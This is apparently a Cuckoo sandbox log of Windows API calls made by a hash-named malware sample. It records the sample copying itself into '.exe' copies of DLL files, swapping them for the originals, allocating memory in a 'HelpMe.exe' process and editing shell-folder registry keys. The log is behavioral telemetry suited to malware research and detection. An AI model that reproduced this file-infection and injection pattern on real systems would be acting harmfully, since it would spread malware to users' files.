"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001cc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000001cc","lpValueName->NoSharedDocuments"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","system","LoadLibraryA","SUCCESS","0x5b860000","lpFileName->netapi32"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001c0","lpFileName->\\.\PIPE\wkssvc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\cuckoo\additional\.gitignore.exe","lpNewFileName->C:\cuckoo\additional\.gitignore"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\cuckoo\dll\cmonitor.dll","dwDesiredAccess->GENERIC_READ"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->268"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","dwDesiredAccess->GENERIC_READ"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001d8","lpFileName->C:\cuckoo\dll\cmonitor.dll","dwDesiredAccess->GENERIC_READ"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001dc","lpFileName->C:\cuckoo\dll\cmonitor.dll.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->39287"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->39287"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->12288"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->12288"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->268"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->268"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\cuckoo\dll\cmonitor.dll"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\cuckoo\dll\cmonitor.dll.exe","lpNewFileName->C:\cuckoo\dll\cmonitor.dll"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001dc","lpFileName->C:\cuckoo\dll\nUsCkV.dll","dwDesiredAccess->GENERIC_READ"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->268"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001dc","lpFileName->C:\f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","dwDesiredAccess->GENERIC_READ"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001d8","lpFileName->C:\cuckoo\dll\nUsCkV.dll","dwDesiredAccess->GENERIC_READ"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\cuckoo\dll\nUsCkV.dll.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->148","szExeFile->f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->39287"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->39287"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->12288"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->12288"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->268"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->268"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","DeleteFileW","FAILURE","","lpFileName->C:\cuckoo\dll\nUsCkV.dll"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","MoveFileWithProgressW","FAILURE","","lpExistingFileName->C:\cuckoo\dll\nUsCkV.dll.exe","lpNewFileName->C:\cuckoo\dll\nUsCkV.dll"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\cuckoo\dll\ornnwr.dll","dwDesiredAccess->GENERIC_READ"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->268"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","dwDesiredAccess->GENERIC_READ"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001d8","lpFileName->C:\cuckoo\dll\ornnwr.dll","dwDesiredAccess->GENERIC_READ"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001c0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000001c0","lpValueName->CommonMusic"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001c0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\ProfileList"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001c0","lpValueName->ProfilesDirectory"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001c0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\ProfileList"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001c0","lpValueName->AllUsersProfile"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001c0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000001c0","lpValueName->CommonMusic","dwType->1","lpData->C:\Documents and Settings\All Users\Documents\My Music","cbData->110"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001c0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001cc","hKey->0x000001c0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001cc","lpValueName->Generation"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001cc","lpFileName->C:\cuckoo\dll\ornnwr.dll.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
